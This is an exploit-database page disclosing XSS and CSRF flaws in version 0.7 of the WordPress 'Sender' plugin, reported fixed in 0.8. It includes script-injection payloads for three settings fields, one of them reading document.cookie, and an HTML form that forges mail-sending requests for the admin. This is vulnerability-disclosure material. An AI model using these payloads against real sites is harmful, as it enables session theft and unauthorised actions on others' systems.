[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Sender 0.7 Cross Site Scripting / Cross Site Request Forgery Vulnerabilities

Author
Madhu Akula
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-24751
Category
web applications
Date add
18-12-2015
Platform
php
WordPress Sender 0.7 Cross Site Scripting / Cross Site Request Forgery Vulnerabilities

Plugin Name : Sender
 
Effected Version : 0.7 (and most probably lower version's if any)
 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Madhu Akula

Technical Details
 
Minimum Level of Access Required : Administrator
 
PoC - (Proof of Concept) :
 
The following fields put the payload as below
 
http://localhost/wp-admin/admin.php?page=sndr_settings&action=go_pro
bws_license_key = “><img src=x onerror=prompt(document.cookie);>
 
http://localhost/wp-admin/admin.php?page=sndr_settings
sndr_from_custom_name = “><script>alert(1)</script>
sndr_from_email = “><script>alert(2)</script>
 
Vulnerable Parameter : bws_license_key, sndr_from_custom_name, sndr_from_email
 
Type of XSS : Reflected / Stored

Plugin Name : Sender A8-Cross-Site_Request_Forgery_(CSRF)
 
Effected Version : 0.7 (and most probably lower version's if any)
 
Vulnerability : A8-Cross-Site Request Forgery (CSRF)
 
Identified by : Madhu Akula
 

 
Technical Details
 
Minimum Level of Access Required : Unauthenticated
 
PoC - (Proof of Concept) :
 
POC for Sending mail :
 
<html>
<body>
<form action=”http://localhost/wp-admin/admin.php?page=sndr_send_user” method=”POST”>
<input type=”hidden” name=”sndr_user_name[subscriber]” value=”1″ />
<input type=”hidden” name=”sndr_subject” value=”test” />
<input type=”hidden” name=”sndr_content” value=”test” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
Impact : we can send mail to any one on behalf of the admin
 
 
Fixed in : 0.8

#  0day.today [2024-12-24]  #